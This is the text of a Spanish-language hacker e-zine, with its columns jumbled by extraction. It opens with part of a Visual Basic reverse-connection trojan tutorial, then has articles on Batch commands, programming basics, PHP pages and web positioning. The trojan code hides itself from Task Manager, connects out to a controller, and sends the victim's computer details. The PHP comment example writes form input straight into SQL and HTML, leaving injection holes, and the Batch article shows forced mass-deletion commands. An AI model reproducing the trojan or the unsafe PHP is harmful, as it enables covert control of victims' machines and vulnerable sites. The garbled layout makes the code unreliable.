\0\ProcessorNameString") ‘júntenlo, es k no cabía, es 1024) + 1
para el procesador....
End Function
App.TaskVisible = False ‘para que no se vea en el
admin de tareas en aplicaciones Private Sub Timer1_Timer()
If App.PrevInstance = True Then: End ‘si ya esta en
If WS.State <> 7 Then ‘si no estamos conectados
ejecución salimos, para no tener 2 corriendo a la vez WS.Close ‘cerramos
CUH e-zine vol #1 - 1ª edición Troyano de Conexión Inversa

WS.CONNECT ip, port ‘nos conectamos


Voy a explicar un poco eso de split y arrays:
End If Nosotros enviamos esto:
End Sub Conexión|Minombre|127.0.0.1|mascotas….
Entonces lo que hacemos es partirlo, y almacenarlo en un
array(en data).
Private Sub WS_Connect() ‘al haber conexión,enviamos
todos los datos De manera que data(0) es lo primero, en este caso
WS.SendData "Conexion|" & victima & "|" & nombrepc “Conexión”,por eso se hace Select Case data(0) porque lo
& "|" & name1 & "|" & so & "|" & GetRamSize & "|" & usamos como identificador.
pais & "|" & procesador & "|" & tor & "|" & webcam Data(1) lo siguiente “Mi nombre” y así sucesivamente….
End Sub
Private Sub WS_DataArrival(ByVal bytesTotal As Long) Bueno, en la siguiente e-zine mas ;)
‘al recibir los datos Espero que les haya gustado, se que no me explico muy bien
On Error Resume Next pero bueno…
Si tienen dudas tienen el foro, saludos!
Dim datos As String
Si hay fallos notifíquenmelo!
Dim data() As String Puede ser porque lo hice rapidito ^^
WS.GetData datos ‘los recibimos
Data=split(datos,”|”) PD:El resultado final:
Select case data(0)
Case "nombrecan" ‘recuerden que fue lo que
enviamos como marca al cambiar el nombre
Open Environ("windir") & "\KB007.txt" For Output As
#1
Print #1, , data(1) ‘ponemos en el texto el nombre que
se cambió
Close #1
End select
End sub

NOTA: Las constantes y módulos, no los he puesto para no


llenar, lo he subido en un .txt, simplemente lean lo que digo
para saber donde ponerlo, el link aquí:
http://eric- By Don Nadie
programs.awardspace.com/CONSTANTESYDEMAS.txt

Bien, hemos visto que enviamos información al conectarse,


ahora en el cliente, la recibimos y la mostramos:

CLIENTE

Case "Conexion"
Dim x As ListItem
Set x = lv.ListItems.Add(, Index & "|", data(1))
‘añadimos los datos, y en la key el indice y “|” para
luego partirlo y poder identificar
x.SubItems(1) = WS(Index).RemoteHostIP ‘mas datos
que añadimos....
x.SubItems(2) = data(2) & "/" & data(3)
x.SubItems(3) = data(4)
x.SubItems(4) = data(5) & " MB"
x.SubItems(5) = data(6)
x.SubItems(6) = data(7)
x.SubItems(7) = data(8)
x.SubItems(8) = data(9)
x.SubItems(9) = "v.1"
End Select
CUH e-zine vol #1 - 1ª edición Introducción al Batch

Introducción al Batch by Furious Dami

¿En qué consiste Batch? Los Comandos presentados a continuación son tan solo los
más usados para ver mas buscar en la carpeta
Batch es un lenguaje de programación que utiliza el “C:\Windows\System32” los archivos sin iconos y con
Sistema Operativo MS-Dos como interprete. No necesita extensión “.exe” o “.com”.
editores ni otros programas, se utiliza el Bloc de Notas
(NotePad) o con cualquier editor de palabra: simplemente
Comandos
lo guardamos con extensión .bat. Cualquier archivo con
extensión .bat es asumido por el sistema operativo como At: Programa comandos o archivos para que se ejecuten a
un ejecutable al igual que los archivos con extensión .exe y una hora determinada.
los .com, básicamente los archivos de proceso por lotes se Attrib: Muestra y cambia los atributos de archivos.
puede correr desde cualquier parte, desde que se tenga un Cd: Muestra o cambia el directorio (carpeta) actual.
acceso directo o icono lo podemos lanzar desde el Chdir: Muestra o cambia la carpeta actual.
escritorio, una carpeta, en fin es un ejecutable (Windows Chkdsk: Escanea y muestra el status de un disco.
nos permite especificarle al sistema operativo que Cls: Borra la pantalla.
archivos queremos que sean ejecutables) desde un bat Cmd: Inicia una nueva ventana del procesador de
también, solo es cuestión de modificar un poco el registro), comandos de Windows XP.
incluso desde otros programas sin importar el tipo de Color: Cambia los colores del fondo y de la letra de la
lenguaje: por ejemplo se puede llamar un bat desde html, consola.
lo mismo que desde cualquier bat se pueden ejecutar otros Comp: Compara el contenido de los archivos.
programas, desde bat se puede hacer cualquier cosa que Compact: Muestra o altera la compactación de archivos en
se base en Windows. discos NTFS.
El bloc de notas Convert: Convierte volúmenes FAT en NTFS.
Para programar en Batch necesitaremos el Bloc de Notas Copy: Copia uno o mas archivos a un directorio diferente.
de Windows, tal vez parezca algo poco común pero es la Date: Muestra o altera la fecha.
herramienta que se utiliza para programar en Batch. En el Del: Borra archivos.
Bloc escribiremos los Source Code (Códigos Fuente) de Dir: Muestra todos los archivos en la carpeta actual.
nuestros Batch, luego en la opción “Guardar como…” Diskcomp: Compara el contenido de dos discos de 3½.
elegimos todos los archivos y lo guardamos con extensión Diskcopy: Copia el contenido de dos discos de 3½.
".bat", debemos tener cuidado con estos archivos, por que Erase: Borra archivos.
si jugamos con comandos como del *.* o algo similar Echo: Oculta el eco de los comandos (no permite que se
podríamos dañar estropear nuestros datos y hasta el S.O., vean los comandos).
claro que también existen formas de recuperarlos , pero Exit: Sale de la consola.
esa no es la idea. FC: Compara y exibe diferencias entre archivos.
Para ejecutar nuestros Batch necesitaremos la Consola Find: Busca una secuencia de textos en uno o mas
(MS-Dos, Símbolo de sistema, Línea de comandos o como archivos.
le quieran llamar) que podemos acceder a ella desde la Format: Formatea un disco.
opción Ejecutar del Menú Inicio, escribimos Cmd y listo. La Goto: Direcciona la consola a una línea de un archivo por
consola es una pantalla negra en la que escribiremos los lotes.
comandos y la que Ejecutara nuestros programas Batch.No IF: Realiza procesamiento bajo condiciones especificas de
todos los comandos que se usan en batch se aplican a la un archivo por lotes.
consola de comandos, claro que son pocos !!! Label: Cambia la etiqueta de volumen de un disco.
MD: Crea una nueva carpeta.
Move: mueve uno o más archivos de una carpeta a otra.
Pause: Pausa el procesamiento de un archivo por lotes
Los Comandos de programación en Batch son los mismos hasta presionar una tecla.
usados en MS-Dos y a continuación daremos una breve Print: Imprime un texto o archivo.
explicación de cada comando y los parámetros utilizados. RD: Remueve una carpeta o directorio.
Para obtener información sobre cualquier comando Recover: Recupera información legible de un disco
tecleamos en la consola el nombre del comando. Ej: dañado.
Rem: Graba comentarios en archivos por lotes o en
Config.sys
Ren: Cambia el nombre de un archivo.
Replace: Substituye archivos.
Set: Muestra, crea o borra las variables de entorno.
Start: Inicia una ventana nueva para ejecutar un comando
o programa.
. Subst: Asocia un camino a una letra de unidad.
CUH e-zine vol #1 - 1ª edición Introducción al Batch

Time: Muestra o modifica la hora del sistema. Con esto estas indicando que se borren todos los archivos
Tree: Exibe gráficamente el árbol de un directorio raíz. que se llamen “Mío”, pero con todas las extensiones.
Type: Muestra el contenido de un archivo de texto. 3) Si quieres eliminar todos los archivos de Word (.doc) y
Title: Cambia el titulo de la ventana de la consola. WorPad (.dot) en la unidad C: con el nombre Poemas se
Ver: Muestra la versión de Windows. utilizan de esta forma:
Vol: Muestra la etiqueta y el volumen de una unidad.
Shutdown: Apaga o reinicia la PC. Del /Q /F C:\poemas.do*
Command: Inicia una nueva ventana del procesador de Esto indicaría que se eliminen todos los archivo con el
comandos de MS-Dos. nombre poemas, pero que tengan una extensión que
Nul: Sirve para anular la respuesta de un comando. comience con “do”.
Tskill: Finaliza programas y procesos (solo para XP Home
Edition).
Taskkill: Finaliza programas y procesos (solo para XP Los Redireccionadores (>> y >)
Professional). Son usados para redireccionar la salida de texto enviada
Net: Administra y configura servicios. por un comando a cualquier otro archivo como en el
siguiente caso:
Pause > elpause.txt
Los Parámetros Si escribiéramos el comando pause solo, saldría el
siguiente texto:
Presione cualquier tecla para continuar…
Se usan para modificar o alterar la función de un pero al colocar el redireccionador ese texto se guardaría
comando. Por ejemplo el comando “DEL”. en el archivo “elpause.txt”, otro ejemplo:
Del sin parámetros sirve para borrar archivos echo Somos todos amigos > texto.txt
comúnmente, pero con los parámetros: En este caso la salida de texto del comando echo seria:
/P: Solicita confirmación antes de borrar cada archivo. Somos todos amigos
/F: Fuerza la eliminación archivos de solo lectura o del Pero con el redireccionador “>” la frase “Somos todos
sistema. amigos” seria guardada en el archivo “texto.txt”.
/S: Borra los archivos de la carpeta actual y todas las sub- El “>”
carpetas. En el siguiente caso:
/A: Selecciona los archivos a ser borrados basándose en Echo La informática es interesante > info.txt
los atributos. Por ejemplo si utilizamos: El redireccionador crearía (en caso de que no existiese)
Del /F /P autoexec.bat un archivo llamado info que tendría adentro la frase “La
Nos pediría confirmación para borrar el archivo informática es algo interesante, pero si ya existiese lo que
“autoexec.bat”, que es un archivo del sistema. haría seria borrar todo el contenido del archivo y añadirle
la frase.
NOTA: Los parámetros de los comandos que esten entre El “>>”
corchetes “[” “]” no son obligatorios. En el siguiente caso:
Echo La informática es interesante >> info.txt
Los Asteriscos (*) El redireccionador crearía (en caso de que no existiese)
un archivo llamado info que tendría adentro la frase “La
Los asteriscos son comodines que sirven para indicar informática es algo interesante, pero si ya existiese lo que
“todo”, aquí van algunos ejemplos de uso de los asteriscos: haría a diferencia de “>” lo que haría seria añadirle luego
de la ultima línea la frase.
1) Imagina que quieres eliminar todos los archivos .mp3 de
la unidad C:\

El código en Batch sería:


El comando Nul y el “>”
Del /Q /F C:\*.mp3
Que indica que se deben eliminar “todos” los archivos con En el siguiente caso:
extensión .mp3 de la unidad C: Echo La informática es interesante>nul
El comando nul a diferencia de los otros no lo guardaría ni
Si el código fuese: redireccionaria simplemente ANULARIA a la frase “La
informática es interesante” y no permitiría que apareciera
Del /Q /F C:\50ce*.mp3 en pantalla.
Indicaría que elimine todos los mp3 que comiencen con el
nombre “50ce” sin importar como terminen.
Las Comillas (“ ”)
Del /Q /F C:\*50ce.mp3 Se usan cuando hay espacios en una ruta o cadenas de
Indicaría que se eliminen todos los archivos mp3 que comando.
terminen en “50ce” sin importar como empiecen. Por ej. :
MD C:\Documents and settings\usuario\Mis
2) Supongamos que deseas borrar todo los archivos Documentos\Super Carpeta
llamados Mío en Mis Documentos, para eso utilizarías: Este código estaría erróneo por que faltan las comillas. El
correcto sería:
Del /Q /F “C:\Documents and Setings\%username%\Mis MD “C:\Documents and settings\usuario\Mis
Documentos\Mio.*” Documentos\Super Carpeta”
CUH e-zine vol #1 - 1ª edición Introducción al Batch

Como hay espacio en los nombres de las carpetas el


código anterior no funcionaria pero usando las comillas se 1) Supongamos que deseas escribir “Todo un 100%”
admiten los espacios en las rutas.
echo Todo un 100%
El signo Interrogación (?) Esto no funcionaria porque el signo % intentaría mostrar
una variable y no aparecería. Entonces el código sería así:
Echo Todo un 100^%
Este signo se usa como comodín para indicar que una letra Al utilizar el símbolo ^ en el % aparecería y no estaría
o numero es desconocido, aquí algunos ejemplos: definiendo una variable.

1) Si quieres eliminar un documento de Word que sabes 2) Si deseas crear un menu que tenga la opción “<1>
que empieza con “Gran” y que tiene 3 carctéres mas AGREGAR USUARIO” esto estaría mal:
puedes usar:
Del /Q /F C:\Gran???.doc echo <1> AGREGAR USUARIO
El signo “?” indicaría que el resto que esas 3 letras son Porque el contenido del archivo “1” se mostraría en Echo y
desconocidas y entonces la maquina buscaría los sería redireccionado a “AGREGAR USUARIO”. El código
documentos que empezaran con “Gran” y continuaran 3 correcto sería así:
caracteres mas hacia delante.
echo ^<^> AGREGAR USUARIO
2) Otro ejemplo es si queres mover todos los archivos que Con esto el > no estaría redireccionando nada y se
terminen con “G” y que tengan 5 letras antes. mostraría en pantalla.
Move C:\?????G.*
Con esto moveríamos todos los archivos que tengan “G”
en el sexto lugar.
El Signo &
3) Si queremos eliminar los archivos de Texto que tengan 4
caracteres seria: Este es un signo que indica el procesamiento de varios
Del C:\????.txt comandos en la misma línea.
Con esto borraríamos todos los archivos de texto en la Cuando es & espera que se ejecute el primer comando y
unidad C: sin importar que letras tengan. ejecuta el segundo si el primero finaliza correctamente,
pero cuando es && no es necesario que el primer
Los signos de % comando finalice correctamente. A continuación un
Este signo es usado para mostrar variables. ejemplo:

Aquí alguna variables de entorno: Para hacer que se ejecuten el Internet Explorer y El Bloc de
Notas con el comando IF al elegir la opción 1 se utilizaría
%username% así:
Con esto mostramos o introducimos el nombre del usuario
actual por ejemplo si utilizamos: If %variable%==1 (Start iexplore && Start notepad)
Echo El usuario es: %username% Así con el mismo número de opción se ejecutarían el
Con esto aparecería el mensaje: El usuario es: Furious Internet Explorer (Iexplore) y el Bloc de Notas (notepad).
Dami
Si fuera el usuario conectado actualmente.
By Furious Dami
%homedrive%
Se usa para indicar el disco local o en el que esta el
sistema operativo que estamos utilizando.

%systemroot%
Se usa para definir la carpeta en la que esta instalado
Windows por ejemplo: C:\Windows

%computername%
Para mostrar el nombre de la computadora..

%homepath%
Abreviación para ir a la ruta del usuario, Ej:
C:\Documents and Settings\ElUsuario
NOTA: Para variables del comando For en lugar de
“%variable%” se usa “%variable”
Resultado de set
El signo ^

Este símbolo es útil para mostrar los %, &&, <, >,etc. ya


que en Batch los caracteres especiales no son mostrados, y
al utilizar estos símbolos si aparecen. Ejemplos
CUH e-zine vol #1 - 1ª edición Introducción al Batch

Resultado de systeminfo

Resultado help
CUH e-zine vol #1 - 1ª edición Metodología de la Programación

Metodología de la programación Editorial


Algoritmo latinizado del gran matemático árabe Mohamed Ibn
Moussa Al Kow Rizmi, el cual escribió su obra Quitab Al
Conjunto de operaciones (sentencias y proposiciones) y Jabr Al Mugabala, donde se recogía el sistema de
procedimientos (Toma de decisiones procesos) que numeración hindú y el concepto del cero. Fue el gran
deben seguirse para la resolución de un problema. El matemático Fibonacci, quien tradujo su obra al latín y
origen etimológico de la palabra deriva del nombre la inició con las palabras: Algoritmi dicit.

Cuando se usa el lenguaje algorítmico debe hacerse un Características:


análisis previo del problema que se va resolver, de las ¾ Inicio, fin
deducciones que se saquen se encuentra un método que ¾ Preciso
permita resolverlo, todas esas operaciones a realizar, y ¾ Simple, Breve y conciso
el orden especifico en que se ejecutan es lo que se ¾ Sencillo, Legible.
denomina algoritmo, dicho algoritmo se codifica o ¾ Modular.
compila a un sistema comprensible por el computador. ¾ Eficiente y Efectivo.

PSEUDOCÓDIGO
DIAGRAMA DE FLUJO
El pseudocódigo describe un algoritmo utilizando
Representa la esquematización grafica de un algoritmo.
distintas frases comunes e instrucciones de programación
En realidad muestra gráficamente los pasos o procesos,
y palabras nemotécnicamente modificadas que definen la
a seguir para alcanzar la solución de un problema. Si el
estructura básica del mismo. Permitiendo al programador
diagrama ha sido elaborado correctamente, el paso al
centrarse en los aspectos lógicos de la solución al
lenguaje de programación es simple y directo
problema, evitando reglas de sintaxis de los lenguajes de
programación. Ningún Pseudocódigo es estándar, varia
de una persona a otra.

Simbología de los diagramas de flujo


Fig. 1

Inicio-fin Proceso Entrada Decisión Imprimir Conexión Conexión Decisión


Externa Interna Múltiple

Flujo o dirección del programa.

variables, operaciones primitivas elementales, leer los


Secuenciación datos y todos aquéllos procesos que se necesiten para la
resolución del problema. Cada instrucción lleva
Es una estructura de control que permite al computador, etiquetado un numero en orden descendente empezando
ejecutar una acción después de otra y luego la que sigue con el 1.
y así sucesivamente .Estas acciones consisten en:
CUH e-zine vol #1 - 1ª edición Metodología de la Programación

Elementos básicos de un algoritmo. 6 fin

Encabezado-> Nombre del algoritmo

Inicio-> Todo algoritmo empieza con la etiqueta 1

Declaraciones-> se declaran variables, funciones , etc.

Procesos->Leer, calcular, imprimir

Fin->

Ejemplo

Sueldo empleado (Rango)

1 inicio

2 cve, ht: entero

Pht, sueldo: real (flotante)


Fig.2
3 Leer cve, ht, pht

4 sueldo=ht*pht

5 imprimir cve, sueldo

Datos la memoria en el computador , deben tener ciertas reglas


Los datos son el alma y vida de una computadora, todo en cuanto a su escritura se refiere: no deben empezar con
gira en torno a ellos, los datos pueden ser simples o números, no tener espacios en blanco, entre otros mas.
estructurados, los datos simples son aquellos que solo
ocupan una casilla de memoria, significando así que Constantes
corresponden a un único valor. Ellos pueden ser: Es un valor fijo que no puede ser modificado, asignado
Numéricos (Reales, Enteros, de coma flotante, y dentro del programa en ejecución durante el proceso de
exponenciales) de Carácter (caracteres, cadenas de compilación.
caracteres y caracteres ASCII) y lógicos (Booleanos )
Variables
De igual forma existen los datos estructurados, a los que Son valores que se asignan para modificarse durante la
para cada dato le son asignadas varias casillas de ejecución o la compilación de un programa.
memoria, pudiendo ser cadenas de caracteres ->(Strings),
Hasta que no se le da un valor a una variable dentro de
arreglos ->(Array) y registros-> (Record- En Bases de
un programa, no podemos hacer uso de ella,
datos)
denominándose a este proceso: sentencia de asignación,
Identificadores siendo esta una operación de destrucción ya que el valor
Son nombres que representan un objeto dentro de un asignado se pierde cuando se sustituye por el nuevo
programa (constantes, variables, datos, procedimientos, valor .También se debe tener en cuenta que el tipo de
funciones), asignar un nombre a las celdas o casillas de expresión debe ser del mismo tipo que el de la variable.

Operadores-> Aritméticos y Lógicos combinan variables y constantes para crear funciones y


se juntan con los operadores aritméticos se forman
Se usan para efectuar operaciones aritméticas o lógicas expresiones aritméticas, que generan un valor, puede ser:
dentro de todos los lenguajes de programación cuando se verdadero o falso.
CUH e-zine vol #1 - 1ª edición Metodología de la Programación

Operadores Aritméticos Operadores Lógicos


Son los conocidos En ocasiones en los programas se necesitan realizar
por todos, ,existen comparaciones entre distintos valores, esto se realiza
todos los utilizando los operadores relaciones, los cuales se listan a
lenguajes. continuación

+ Suma Operador
- Resta < Menor que
* Multiplicación > Mayor que
/ División <= Menor o igual que
^ Exponenciación >= Mayor o igual que
mod Módulo = Igual a
div División entera <> Distinto a, diferente de

Jerarquía o Precedencia de Operadores


Cuando aparecen dos o mas expresiones aritméticas
debemos tener en cuenta la prioridad de la operación a Flujograma o Diagrama de flujo Æ Es la representación
desarrollar, los paréntesis tiene la mayor prioridad, se o esquematización gráfica de un algoritmo, existen unas
realizan las operaciones siempre, empezando desde el normas o estándares representativos que definen el tipo
más interno del nido. de estructura algorítmica, ver Figs. 1 y 2

Tipo de dato Æ Define un valor para cada dato y la


forma con que será almacenado y procesado
posteriormente, los datos pueden ser : numéricos (Reales
,flotantes, etc.), de caracteres, booleanos o lógicos, Etc.,
cuando un dato se guarda en memoria debe asignársele
un valor, para poder realizar posteriormente un
determinado proceso correctamente, hay que tener en
cuenta que un solo error en la asignación del tipo de
dato o un error de escritura pueden dar al traste con
todo un programa , es muy importante saber definir el
valor a los datos para el apropiado funcionamiento de
cualquier programa.

Ciclo Æ (Bucle o Loop) Es una repetición de sentencias o


secuencia de sentencias un número definido de veces o
Glosario 1 iteraciones.
Algoritmo Æ Sucesión o secuencia ordenada y
cronológica de pasos o actividades que conllevan a la Identificador Æ Son calificativos que se usan para hacer
solución de un problema o a la ejecución de una labor (o referencia a variables, constantes, funciones o cualquier
acción). objeto definido: bien sea por el programador o por el
usuario.
Programa Æ Conjunto de sentencias o instrucciones que
hacen funcionar a un computador, por lo general estan Constante Æ Son datos predefinidos que permanecen
compuestos por una serie de módulos y estructuras, ellos intactos durante la ejecución de un programa.
realizan un proceso que suple una necesidad de un
sistema especifico de información. Al conjunto de Variable Æ Es un dato identificador que cambia su valor
programas escritos en y para los computadores se le (existe un valor para cada tipo de dato) mientras el programa
acuña un término en ingles, muy conocido: Software. esta en acción,

Pseudocódigo Æ Término para referirse a un algoritmo, Rutina Æ Secuencia de instrucciones o sentencias


recurriendo a una mezcla de oraciones o palabras en (modulo), que hace parte de un programa y que puede
lenguaje cotidiano, instrucciones de programación y usarse varias veces dentro de la ejecución del mismo.
CUH e-zine vol #1 - 1ª edición Metodología de la Programación

Acceso Æ Referencia que se hace a a un elemento Arreglo Æ Es un tipo de dato que contiene una
específico dentro de un arreglo, indicando el nombre del estructurado que permite almacenar varios valores de un
arreglo y la posición del arreglo (índice). mismo tipo, a cada uno de los cuales se accede por un
índice entero.
Índice Æ Valor que especifica un rango (nombre y
ubicación) dentro de un arreglo. MatrizÆ Es una variable que permite almacenar
múltiples valores de un mismo tipo.

Este articulo es tan solo una introducción a la metodología de la programación, en la próxima parte practica: diseño de
algoritmos y diagramas de flujo, espero lo hayan disfrutado, ah! y si, es de ustedes , hagan lo que quieran con el !
Editorial
CUH e-zine vol #1 - 1ª edición Varios Conocimientos Web

Varios Conocimientos Web By Gallloo

Distintas secciones en un mismo documento $servidor="server.com:port"; 


$user="usuario"; 
index.php $pass="password"; 
$conexion=mysql_connect($server,$user,$pass);//nos 
<ul>
conectamos 
<li><a href="index.php?pag=home">Home</a></li>
mysql_select_db("nombre_bd",$conexion); 
<li><a href="index.php?pag=des">Descargas</a></li> //especificamos la base de datos 
<li><a href="index.php?pag=jue">Juegos</a></li> ?> 
<li><a href="index.php?pag=info">Info</a></li>
</ul> index.php
<?php <?php 
if(!isset($_GET["pag"])){ echo'<form action="index.php?mostrar=si" 
// si no existe la variable de URL, pag... method="post" > 
echo'<script>top.location="index.php?pag=home";</s <input type="text" name="nick" size="20"  /><br 
cript>'; //redirigimos a home /><br /> 
<textarea name="texto" rows="7"></textarea><br /><br 
} /> 
if($_GET["pag"]=="home"){ <input type="submit" value="Enviar" /> 
echo'Bienvenido a mi web... blablabla'; //si la </form><br /><br />'; //formulario 
variable es igual a home hacemos tal  
} include("bd.php");  
if($_GET["pag"]=="des"){ //incluimos la info de la bd 
$query1=mysql_query("select texto from 
echo'Descargate estos magníficos programas....'; //si
comentario",$conexion); 
la variable es igual a des hacemos tal
//llamamos al texto de la tabla  
}
$query2=mysql_query("select nick from 
if($_GET["pag"]=="jue"){ comentario",$conexion); 
echo'Aquí tienes varios juegos:...'; //llamamos al nick de la tabla  
//si la variable es igual a jue hacemos tal while($d1=mysql_fetch_array($query1)){ 
} //la pasamos a array 
}   $d2=mysql_fetch_array($query2); 
if($_GET["pag"]=="info"){   echo $d1[0]."<br>by ".$d2[0]."<br><br>"; 
echo'Información'; //muestra todos las filas 
//si la variable es igual a info hacemos tal } 
} if($_GET["mostrar"]=="si"){ 
?> //si la variable GET llamada mostrar es //igual a 
"si"... 
Ahí dejo explicado de forma breve como hacer una   $nick=$_POST["nick"]; 
//recibimos el nick del form 
web con diferentes secciones en un mismo documentos
  $texto=$_POST["texto"]; 
php, ahora veremos como hacer un sistema de //recibimos el texto del form 
comentarios algo más complejo ya que requiere algún   mysql_query("insert into comentario(nick, 
conocimiento de mysql también. texto) values('$nick','$texto')",$conexion); 
//insertamos los datos en la bd 
Sistema básico de comentarios   echo 
'<script>top.location="index.php";</script>'; 
//redirigimos a la pagina principal //mediante 
Crearemos 3 archivos: javascript 
-index.php – ahí se encontrarán los comentarios y es } 
donde se postearán. ?> 
-bd.php – aquí se encuentra toda la información sobre
para conectarnos a la base de datos. crear.php
-crear.php – solo lo abrimos una vez y nos servirá para <?php 
include("bd.php");//incluimos la info de la bd para 
crear las tablas.
crear la tabla 
mysql_query("create table comentario(nick 
bd.php varchar(50),texto text)",$conexion); //creamos la 
<?php 
CUH e-zine vol #1 - 1ª edicion Varios Conocimientos Web

tabla  recuerdo que también está disponible para linux y


mysql_close($conexion);//cerramos la conexión  otros sistemas operativos.
?> 
 
Bueno, el sistema de comentarios ya está, no le he Subimos los ficheros de la web por el FTP
añadido ninguna hoja de estilos ni nada (estará un
poco soso) pero eso ya lo dejo que lo hagáis vosotros. Ponemos los datos en el filezilla y nos conectamos
Ahora explico como subir los archivos al FTP para los
más nuevos en la programación web.

Buscamos un hosting

En esta ocasión va a ser este

Subimos los archivos de la web


Nos registramos, poniendo nuestros datos

Ya lo tenemos subido

Ahora nos redireccionará a un pdf con todos los datos


de acceso.

Esto, es todo! Si tenéis alguna duda postead en la


sección de webmasters. By Gallloo

Nos pillamos la ultima versión de filezilla aunque hay


otra mas reciente en español pero está en beta,
CUH e-zine vol #1 - 1ª edición Posicionamiento Web

Posicionamiento web by XD
Antes que nada tienes que decidir para que estas haciendo tu
Web para ganar dinero o para ganar users algunas veces Ejemplo no próximamente y que algunos link están muertos tu
sobre todo si apenas comienzas en creación de Web , al Web tiene q estar bien hecha accesible y no confusa para tus
ponerle publicidad pierdes cosas útiles para tus visitantes y visitantes
también al contrario pasa lo mismo al optimizarla para los si esta hecha con algún script prefabricado dejarle los
buscadores. créditos sin faltas de ortografía sugiérelo en la categoría
correcta si algún sitio de tu competencia (temática) esta ve
que categoría es y ahí inscribe tu Web no la mandes varias
veces por que los editores se molestan y no la mandas en
cada categoría mándala en una y los editores si ven que
podría tener doble triple etc. la pondrán existen rumores que
algunos editores cobran por aceptarte la Web si detectas
Dar de alta en google y en otros algún abuso en el DMOZ Escribe en http://dmoz.org/cgi-
Aunque google no asegura que tu url la va a indexar bin/feedback.cgi
mándala varias veces no te penaliza ni nada, también es
importante darla de alta en otros buscadores aunque es Como sugerir un sitio a DMOZ
cierto que q la mayoría usa google no esta de mas también fuente:http://www.dmoz.org
inscribirlo en otros:
google Paso1
http://www.google.com/intl/es/addurl.html ¿Cómo agrego un sitio al Open Directory Project?
msn Agregar un sitio es fácil. Simplemente siga estas
http://search.msn.com/docs/submit.aspx instrucciones.
yahoo altavista Cómo sugerir un sitio a Open Directory
http://es.altavista.com/addurl/default
* No envíe sitios espejo. Sitios espejo son aquellos que tienen
DMOZ : Open Directory Project un contenido idéntico pero con URLs distintos.
DMOZ : Open Directory Project , ODP , o algunos le llaman
directory de mozilla. * No envíe URLs que contengan únicamente el mismo o
Para aparecer en los primeros lugares en google tienes que similar contenido que otros sitios que puedan estar listados
estar en ese directorio porque es donde se basa para listar en el directorio. Sitios con contenido coincidente y repetitivo
las Webs no son útiles para los usuarios del directorio. Múltiples envíos
del mismo sitio o de sitios relacionados puede producir que
Intenta inscribirte realmente es difícil pero si lo consigues sean excluidos y/o borrados estos sitios y todos sus afiliados.
será un grande logro
¿nada mas google? no la mayoría AOL Search, Lycos, * No disfrace sus envíos para sugerir el mismo URL más de
HotBot, DirectHit y otros cientos más una vez.
Ejemplo:
http://www.dmoz.org
Dmoz.org http://www.dmoz.org/index.html
Es un directorio de webs creado por Netscape y AOL se
divide en idiomas países categorías se basa en usuarios * No envíe ningún sitio con una URL que redireccione a otra
editores como la Wiki puedes entrar como editor pero no es distinta.
necesario para que te agreguen tu Web al ser como la wiki
existen parecidos problemas editores malos etc. * El Open Directory tiene una política contra la inclusión de
sitios con contenido ilegal. Ejemplos de material ilegal
DMOZ es gratis y no lo confundas no es buscador aunque incluyen pornografía infantil, difamación, materiales que
tiene uno pero solo es interno infrinjan algún derecho de la propiedad intelectual y material
es un directorio y es totalmente gratis aparecen sitios basura que específicamente apoye, solicite o ampare actividades
en DMOZ pero porque lleva varios años online desde 1998 ilegales (como el fraude o la violencia).

Recomendaciones de tu Web * No envíe sitios "En construcción". Espere hasta que el sitio
tiene que estar bien hecha no la clásica que parece geocities esté terminado antes de enviarlo. Sitios incompletos, con
de hace 15 años no un myspaces spacelive tener dominio avisos "En construcción" o que contengan gráficos o enlaces
propio Web terminada: rotos no son buenos candidatos para el directorio.
CUH e-zine vol #1 - 1ª edicion Posicionamiento Web

* Envíe los sitios de pornografía a la categoría apropiada Si (y sólo si) no está de acuerdo con la respuesta del editor,
dentro de Adult. puede usar el enlace "reportar abuso/spam" en la parte
superior de la página para recurrir la decisión del editor. Sea
* Envíe los que no están en inglés a la categoría apropiada concreto con respecto a su desacuerdo (incluyendo por qué
dentro de World. piensa que la respuesta del editor es inadecuada). Los
comentarios realizados por medio del enlace "reportar
* No envíe sitios compuestos mayoritariamente por enlaces abuso/spam" son revisados por el staff del ODP, que tomará
afiliados. la decisión final. Por favor, NO envíe mensajes a Netscape,
Paso 2 eso sólo retrasará y complicará el proceso. Nos tomamos
muy en serio las observaciones y les prestamos gran
Realice una búsqueda rápida en el directorio en dmoz.org atención. Pero recuerde que debemos mantener nuestro
para asegurarse de que su sitio no está ya incluido. De esta criterio y realizar numerosos juicios sobre cómo hacer el
forma todos ahorraremos tiempo. ODP tan útil como sea posible, independientemente de la
Paso 3 decisión que tomemos, no conseguiremos satisfacer siempre
a todos.
Identifique la categoría (una sola) que mejor defina su sitio. Posicionando su sitio en portales y motores de búsqueda que
El Open Directory posee una enorme variedad de temas entre utilizan los datos del ODP
los que elegir. Deber enviar su sitio a una única categoría, la Si su sitio ha sido aceptado en el Open Directory, puede
que sea más relevante. Los sitios enviados a categorías tardar de dos semanas a varios meses en ser listado en los
inapropiadas o no relacionadas pueden ser rechazados o sitios que utilizan los datos del ODP, como por ejemplo AOL
eliminados. Search, Google, Netscape Search, Yahoo Search, y otros
Nota: algunas categorías no ofrecen los enlaces "Sugerir cientos de sitios. Actualizamos los datos disponibles
URL" o "Actualizar URL". Estas categorías no aceptan envíos, semanalmente, pero cada uno de estos sitios tiene su propio
por lo tanto debería encontrar una categoría más específica calendario de actualizaciones.
para su sitio. Criterio editorial
Paso 4
Una vez que ha seleccionado la mejor categoría para su Procedimiento una vez que ha sugerido su sitio
sitio, vaya directamente a esa categoría en dmoz.org y Por favor, comprenda que hacer del ODP un recurso valioso,
entonces utilice "Sugerir URL". Siga las instrucciones del requiere que apliquemos nuestro criterio editorial para
formulario de envío cuidadosamente. La descripción debería determinar el contenido y la estructura del directorio. Ese
informar del contenido del sitio de forma concisa y precisa. criterio se extiende (pero no se limita) a qué sitios incluir,
No deben ser de naturaleza promocional. Enviar una dónde se colocan los sitios dentro del directorio, cuándo y si
descripción promocional en vez de una objetiva y bien escrita procede incluir más de un enlace a un sitio, cuándo son
puede retrasar significativamente el listado de su sitio o apropiados los enlaces profundos y el contenido del título y
impedir totalmente que sea listado. El software para el envío la descripción del sitio. Además, la situación de un sitio en el
automático de sitios es (y siempre ha sido) una violación de directorio es susceptible de ser modificada y borrado en
este proceso. Los sitios enviados automáticamente son cualquier momento a nuestro único criterio. No debería dar
marcados y después de aceptarse el envío, borrados sin por supuesto que un sitio será incluido en el directorio. Por
notificárselo. Los envíos automatizados enviados de forma favor, comprenda que al aplicar el criterio de edición puede
